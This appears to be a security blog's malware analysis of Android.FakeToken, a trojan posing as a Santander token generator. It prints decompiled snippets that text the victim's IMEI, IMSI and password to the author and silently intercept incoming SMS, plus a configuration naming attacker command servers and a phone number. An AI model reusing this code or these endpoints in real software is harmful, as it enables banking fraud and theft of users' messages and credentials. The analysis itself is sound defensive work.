Detailed Analysis of Android.FakeToken

Intro: What is Android.FakeToken?

This new malware-family emerged some days ago within a spanish Spam-campain and spreads through email and SMS messages. This new Android malware tries to forward mTAN SMS messages to a remote user and thus has the typical man-in-the-middle functionality, we have already seen in malware families like Zeus and SpyEye, but it also can be controlled remotely and doesn’t need to infect the user’s PC.

Analysis of the Application and Its Structure

When installing the app it requests the following permissions:

  • android.permission.READ_PHONE_STATE
  • android.permission.ACCESS_NETWORK_STATE
  • android.permission.SEND_SMS
  • android.permission.RECEIVE_SMS
  • android.permission.INTERNET
  • android.permission.WRITE_EXTERNAL_STORAGE
  • android.permission.INSTALL_PACKAGES
  • android.permission.DELETE_PACKAGES
  • android.permission.READ_CONTACTS
  • android.permission.RECEIVE_BOOT_COMPLETED

After the application has been installed successfully, the icon of the app shows up in the dashboard and the application registers some receivers which will trigger when a specific system event occurs (for example: BOOT_COMPLETED, USER_PRESENT, PHONE_STATE or SMS_RECEIVED). When the user executes the app, it shows a WebView component that displays an html-page which looks like a Token-Generator and it appears to be from the targeted bank (in our case it should look like the Santander Consumer Bank):

localWebView.addJavascriptInterface(new WebApi(this), "android");
System.out.println("Build.VERSION.RELEASE: " + Build.VERSION.RELEASE);
if ((Build.VERSION.RELEASE.startsWith("2.3.1")) || (Build.VERSION.RELEASE.startsWith("2.3.3")))
      localWebView.loadUrl("file:///android_asset/html/index_bag.html");
....

To get the fake token (just a random number), the user must enter the first factor of authentication. As soon as this step is done, the application sends a SMS message to the author and starts a background service afterwards:

public void sendPass(String paramString)
  {
    try
    {
      if (!Settings.saved.sendInitSms)
      {
        Settings.saved.sendInitSms = true;
        String str = Settings.saved.smsPrefix + " INIT " + MainApplication.imei + " " + MainApplication.imsi + " " + paramString;
        MainService.sendSms(Settings.saved.number, str);
        MainApplication.settings.save(this.context);
      }
....

This background service is listening to commands from the remote server (e.g. update of configuration) and starts periodically. When the smartphone of the victim receives a SMS message, the broadcast will be aborted and the message will be forwarded to a given phone number or remote server.

abortBroadcast();
SmsMessage localSmsMessage = arrayOfSmsMessage[j];
String str1 = localSmsMessage.getOriginatingAddress();
String str2 = localSmsMessage.getMessageBody();
CatchResult localCatchResult = MainApplication.settings.isCatchMessage(str1, str2);
if (localCatchResult.result)
   MainService.start(paramContext, paramIntent, "catch", str1, str2, localCatchResult.key);
if ((MainApplication.settings.isNewServer(paramContext, str1, str2)) || (MainApplication.settings.isDeleteMessage(str1, str2)))

The application sends IMEI, IMSI, phone type, version, sid, phone number and the SMS body within a HTTP Post to one of the corresponding remote servers. These servers and all necessary information are stored in a xml configuration (/data/data/token.generator/files/settings):


   
   
   79021121067
   1.0
   santander
   
   
      http://icoolshop.ru/cp/server.php
      http://iconsshopbest.com/cp/server.php
   
   qe4faf23r4e2
   sid_1
   false
   1331934321409
   43200

This file can be updated remotely (via SMS and HTTP GET) if the phone number or server address of the malware author changes. The malware also has the ability to install further apk-files and sends the phone numbers of all entries in the address book of the victim to a remote server. The last step happens probably for further distribution of the malware.

Sample Information:

sha256:
f7c36355c706fc9dd8954c096825e0613807e0da4bd7f3de97de0aec0be23b79

md5:
4548973449f707a6359a9b321ef54d31

Mobile-Sandbox Report

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.